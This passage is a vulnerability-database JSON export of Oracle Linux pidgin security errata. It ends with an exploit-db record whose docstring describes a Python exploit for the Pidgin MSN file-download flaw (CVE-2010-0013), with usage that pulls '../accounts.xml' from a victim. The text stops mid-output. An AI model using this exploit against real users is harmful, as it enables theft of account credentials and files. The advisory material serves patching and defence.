"4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-2.6.6-1.el4.src.rpm", "packageName": "pidgin", "arch": "src", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-2.6.6-1.el4.src.rpm", "packageName": "pidgin", "arch": "src", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "finch-devel-2.6.6-1.el4.i386.rpm", "packageName": "finch-devel", "arch": "i386", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "finch-devel-2.6.6-1.el4.ia64.rpm", "packageName": "finch-devel", "arch": "ia64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-2.6.6-1.el4.ia64.rpm", "packageName": "libpurple", "arch": "ia64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "finch-devel-2.6.6-1.el4.x86_64.rpm", "packageName": "finch-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-perl-2.6.6-1.el4.i386.rpm", "packageName": "pidgin-perl", "arch": "i386", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-perl-2.6.6-1.el4.i386.rpm", "packageName": "libpurple-perl", "arch": "i386", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-tcl-2.6.6-1.el4.ia64.rpm", "packageName": "libpurple-tcl", "arch": "ia64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-devel-2.6.6-1.el4.ia64.rpm", "packageName": "libpurple-devel", "arch": "ia64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-2.6.6-1.el4.x86_64.rpm", "packageName": "pidgin", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-perl-2.6.6-1.el4.ia64.rpm", "packageName": "libpurple-perl", "arch": "ia64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "finch-2.6.6-1.el4.x86_64.rpm", "packageName": "finch", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-tcl-2.6.6-1.el4.i386.rpm", "packageName": "libpurple-tcl", "arch": "i386", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-perl-2.6.6-1.el4.x86_64.rpm", "packageName": "pidgin-perl", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-devel-2.6.6-1.el4.x86_64.rpm", "packageName": "pidgin-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-devel-2.6.6-1.el4.i386.rpm", "packageName": "pidgin-devel", "arch": "i386", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-devel-2.6.6-1.el4.i386.rpm", "packageName": "libpurple-devel", "arch": "i386", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-perl-2.6.6-1.el4.ia64.rpm", "packageName": "pidgin-perl", "arch": "ia64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-2.6.6-1.el4.ia64.rpm", "packageName": "pidgin", "arch": "ia64", "operator": "lt"}], "description": "[2.6.6-1]\n- 2.6.6 with security and numerous minor bug fixes\n CVE-2010-0277 CVE-2010-0420 CVE-2010-0423\n- Bug #528796: Get rid of #!/usr/bin/env python ", "edition": 1, "reporter": "Oracle", "published": "2010-02-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "pidgin security update", "type": "oraclelinux", "bulletinFamily": "unix", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2010-02-18T00:00:00", "id": "ELSA-2010-0115", "href": "http://linux.oracle.com/errata/ELSA-2010-0115.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:17:14", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "x86_64", "packageFilename": "pidgin-2.6.6-5.el4_8.x86_64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "i386", "packageFilename": "libpurple-perl-2.6.6-5.el4_8.i386.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "x86_64", "packageFilename": "libpurple-perl-2.6.6-5.el4_8.x86_64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "i386", "packageFilename": "libpurple-devel-2.6.6-5.el4_8.i386.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "ia64", "packageFilename": "finch-devel-2.6.6-5.el4_8.ia64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "x86_64", "packageFilename": "finch-devel-2.6.6-5.el4_8.x86_64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "ia64", "packageFilename": "libpurple-perl-2.6.6-5.el4_8.ia64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "ia64", "packageFilename": "libpurple-2.6.6-5.el4_8.ia64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "src", "packageFilename": "pidgin-2.6.6-5.el4_8.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "src", "packageFilename": "pidgin-2.6.6-5.el4_8.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "src", "packageFilename": "pidgin-2.6.6-5.el4_8.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "ia64", "packageFilename": "pidgin-2.6.6-5.el4_8.ia64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "i386", "packageFilename": "finch-2.6.6-5.el4_8.i386.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "i386", "packageFilename": "pidgin-devel-2.6.6-5.el4_8.i386.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "i386", "packageFilename": "finch-devel-2.6.6-5.el4_8.i386.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "x86_64", "packageFilename": "libpurple-2.6.6-5.el4_8.x86_64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "ia64", "packageFilename": "pidgin-devel-2.6.6-5.el4_8.ia64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "x86_64", "packageFilename": "libpurple-devel-2.6.6-5.el4_8.x86_64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "i386", "packageFilename": "libpurple-2.6.6-5.el4_8.i386.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "ia64", "packageFilename": "libpurple-tcl-2.6.6-5.el4_8.ia64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "ia64", "packageFilename": "libpurple-devel-2.6.6-5.el4_8.ia64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "ia64", "packageFilename": "pidgin-perl-2.6.6-5.el4_8.ia64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "x86_64", "packageFilename": "pidgin-devel-2.6.6-5.el4_8.x86_64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "i386", "packageFilename": "libpurple-tcl-2.6.6-5.el4_8.i386.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "x86_64", "packageFilename": "finch-2.6.6-5.el4_8.x86_64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "x86_64", "packageFilename": "pidgin-perl-2.6.6-5.el4_8.x86_64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "x86_64", "packageFilename": "libpurple-tcl-2.6.6-5.el4_8.x86_64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "i386", "packageFilename": "pidgin-2.6.6-5.el4_8.i386.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "ia64", "packageFilename": "finch-2.6.6-5.el4_8.ia64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "i386", "packageFilename": "pidgin-perl-2.6.6-5.el4_8.i386.rpm", "packageName": "pidgin-perl", "operator": "lt"}], "description": "[2.6.6-5]\n- Add patch for CVE-2010-1624 (RH bug #644153).\n[2.6.6-4]\n- Initial patch for CVE-2010-3711 was incomplete. Here's the rest.\n[2.6.6-3]\n- Add patch for CVE-2010-3711 (RH bug #644153). ", "edition": 1, "reporter": "Oracle", "published": "2010-10-21T00:00:00", "title": "pidgin security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "oraclelinux", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1624", "CVE-2010-3711"], "modified": "2010-10-21T00:00:00", "id": "ELSA-2010-0788", "href": "http://linux.oracle.com/errata/ELSA-2010-0788.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:16:39", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "finch-2.7.9-3.el6.i686.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "finch-2.7.9-3.el6.i686.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "pidgin-perl-2.7.9-3.el6.i686.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "x86_64", "packageFilename": "finch-2.7.9-3.el6.x86_64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "x86_64", "packageFilename": "libpurple-devel-2.7.9-3.el6.x86_64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "x86_64", "packageFilename": "finch-devel-2.7.9-3.el6.x86_64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "libpurple-devel-2.7.9-3.el6.i686.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "libpurple-devel-2.7.9-3.el6.i686.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "x86_64", "packageFilename": "pidgin-2.7.9-3.el6.x86_64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "x86_64", "packageFilename": "libpurple-perl-2.7.9-3.el6.x86_64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "finch-devel-2.7.9-3.el6.i686.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "finch-devel-2.7.9-3.el6.i686.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "x86_64", "packageFilename": "libpurple-2.7.9-3.el6.x86_64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "libpurple-tcl-2.7.9-3.el6.i686.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "libpurple-perl-2.7.9-3.el6.i686.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "x86_64", "packageFilename": "pidgin-devel-2.7.9-3.el6.x86_64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "pidgin-devel-2.7.9-3.el6.i686.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "pidgin-devel-2.7.9-3.el6.i686.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "x86_64", "packageFilename": "pidgin-docs-2.7.9-3.el6.x86_64.rpm", "packageName": "pidgin-docs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "libpurple-2.7.9-3.el6.i686.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "libpurple-2.7.9-3.el6.i686.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "pidgin-2.7.9-3.el6.i686.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "x86_64", "packageFilename": "libpurple-tcl-2.7.9-3.el6.x86_64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "src", "packageFilename": "pidgin-2.7.9-3.el6.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "src", "packageFilename": "pidgin-2.7.9-3.el6.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "x86_64", "packageFilename": "pidgin-perl-2.7.9-3.el6.x86_64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.9-3.el6", "arch": "i686", "packageFilename": "pidgin-docs-2.7.9-3.el6.i686.rpm", "packageName": "pidgin-docs", "operator": "lt"}], "description": "[2.7.9-3.el6]\n- Add patch for RH bug #684685 (zero-out crypto keys before freeing).\n[2.7.9-2.el6]\n- Add patch for CVE-2011-1091 (RH bug #683031).\n[2.7.9-1.el6]\n- Update to 2.7.9 (RH bug #616917).\n- Remove patches now included upstream:\n pidgin-2.6.6-clientLogin-proxy-fix.patch\n pidgin-2.6.6-clientLogin-use-https.patch\n pidgin-2.6.6-CVE-2010-1624.patch\n pidgin-2.6.6-CVE-2010-3711.patch\n- Disable the translation updates patch. It doesn't apply anymore and\n will have to be redone. Saving the patch for now in case some parts\n are still useful to translators.", "edition": 1, "reporter": "Oracle", "published": "2011-05-28T00:00:00", "title": "pidgin security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "oraclelinux", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1091", "CVE-2010-1624", "CVE-2011-4922", "CVE-2010-3711"], "modified": "2011-05-28T00:00:00", "id": "ELSA-2011-0616", "href": "http://linux.oracle.com/errata/ELSA-2011-0616.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:16:42", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "libpurple-perl-2.6.5-1.el4.1.i386.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "libpurple-tcl-2.6.5-1.el4.1.i386.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "libpurple-perl-2.6.5-1.el4.1.ia64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "libpurple-devel-2.6.5-1.el4.1.ia64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "pidgin-devel-2.6.5-1.el4.1.i386.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "pidgin-perl-2.6.5-1.el4.1.ia64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "pidgin-2.6.5-1.el4.1.x86_64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "finch-2.6.5-1.el4.1.x86_64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "libpurple-perl-2.6.5-1.el4.1.x86_64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "libpurple-tcl-2.6.5-1.el4.1.x86_64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "finch-devel-2.6.5-1.el4.1.ia64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "libpurple-devel-2.6.5-1.el4.1.x86_64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "pidgin-2.6.5-1.el4.1.i386.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "libpurple-2.6.5-1.el4.1.x86_64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "pidgin-2.6.5-1.el4.1.ia64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "libpurple-tcl-2.6.5-1.el4.1.ia64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "pidgin-devel-2.6.5-1.el4.1.ia64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "libpurple-devel-2.6.5-1.el4.1.i386.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "pidgin-devel-2.6.5-1.el4.1.x86_64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "finch-devel-2.6.5-1.el4.1.i386.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "finch-2.6.5-1.el4.1.ia64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "libpurple-2.6.5-1.el4.1.i386.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "finch-2.6.5-1.el4.1.i386.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "pidgin-perl-2.6.5-1.el4.1.x86_64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "libpurple-2.6.5-1.el4.1.ia64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "finch-devel-2.6.5-1.el4.1.x86_64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "src", "packageFilename": "pidgin-2.6.5-1.el4.1.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "src", "packageFilename": "pidgin-2.6.5-1.el4.1.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "src", "packageFilename": "pidgin-2.6.5-1.el4.1.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "pidgin-perl-2.6.5-1.el4.1.i386.rpm", "packageName": "pidgin-perl", "operator": "lt"}], "description": "[2.6.5-1.el4.1]\n- 2.6.5\n- CVE-2010-0013\n- Other bug fixes\n- build with old gcc\n[2.6.4-4]\n- temporarily disable evolution integration in F13 until it is fixed\n[2.6.4-2]\n- disable SILC in EL6 builds\n[2.6.4-1]\n- 2.6.4 ", "edition": 1, "reporter": "Oracle", "published": "2010-01-14T00:00:00", "title": "pidgin security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "oraclelinux", "bulletinFamily": "unix", "cvelist": ["CVE-2010-0013"], "modified": "2010-01-14T00:00:00", "id": "ELSA-2010-0044", "href": "http://linux.oracle.com/errata/ELSA-2010-0044.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-01T13:50:53", "osvdbidlist": ["61420"], "references": [], "edition": 1, "description": "Pidgin MSN <= 2.6.4 File Download Vulnerability. CVE-2010-0013. Remote exploits for multiple platform", "reporter": "Mathieu GASPARD", "published": "2010-01-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "Pidgin MSN <= 2.6.4 File Download Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0013"], "modified": "2010-01-19T00:00:00", "id": "EDB-ID:11203", "href": "https://www.exploit-db.com/exploits/11203/", "sourceData": "#!/usr/bin/env python \r\n\"\"\"\r\nPidgin MSN <= 2.6.4 file download vulnerability\r\n\r\n19 January 2010\r\n\r\nMathieu GASPARD (gaspmat@gmail.com)\r\n\r\n\r\nDescription:\r\n\t\tPidgin is a multi-protocol Instant Messenger.\r\n\r\n\t\tThis is an exploit for the vulnerability[1] discovered in Pidgin by Fabian Yamaguchi.\r\n\t\tThe issue is caused by an error in the MSN custom smiley feature when processing emoticon requests, \r\n\t\twhich could allow attackers to disclose the contents of arbitrary files via directory traversal attacks.\r\n\r\nAffected versions :\r\n\t\tPidgin <= 2.6.4, Adium and other IM using Pidgin-libpurple/libmsn library.\r\n\t\tPlugin msn-pecan 0.1.0-rc2 (http://code.google.com/p/msn-pecan/) IS also vulnerable even if Pidgin is up to date\r\n\r\nPlateforms :\r\n\t\tWindows, Linux, Mac\r\n\r\nFix :\r\n\t\tFixed in Pidgin 2.6.5\r\n\t\tUpdate to the latest version : http://www.pidgin.im/download/\r\n\r\nReferences :\r\n\t\t[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013\r\n\t\t[2] http://www.pidgin.im/news/security/?id=42\r\n\r\nUsage :\r\n\t\tYou need the Python MSN Messenger library : http://telepathy.freedesktop.org/wiki/Pymsn\r\n\t\tpython pidgin_exploit.py -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE [-o OUTPUT_FILE] [-l]\r\n\r\nExample : \r\n# python pidgin_exploit.py -a foo@hotmail.com -c victim@hotmail.com -f ../accounts.xml [-o accounts.xml]\r\n\r\n\t\t***********************************************************\r\n\r\n\t\tPidgin MSN file download vulnerability (CVE-2010-0013)\r\n\r\n\t\tUsage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]\r\n\r\n\t\t***********************************************************\r\n\r\n\t\tPlease enter the password for the account \"foo@hotmail.com\"\r\n\t\tPassword:\r\n\t\t[+] Connecting to server\r\n\t\t[+] Authentication in progress\r\n\t\t[+] Synchronisation in progress\r\n\t\t[+] OK, all done, ready to proceed\r\n\t\t[+] Sending request for file \"../accounts.xml\" to \"victim@hotmail.com\"\r\n\t\t[+] 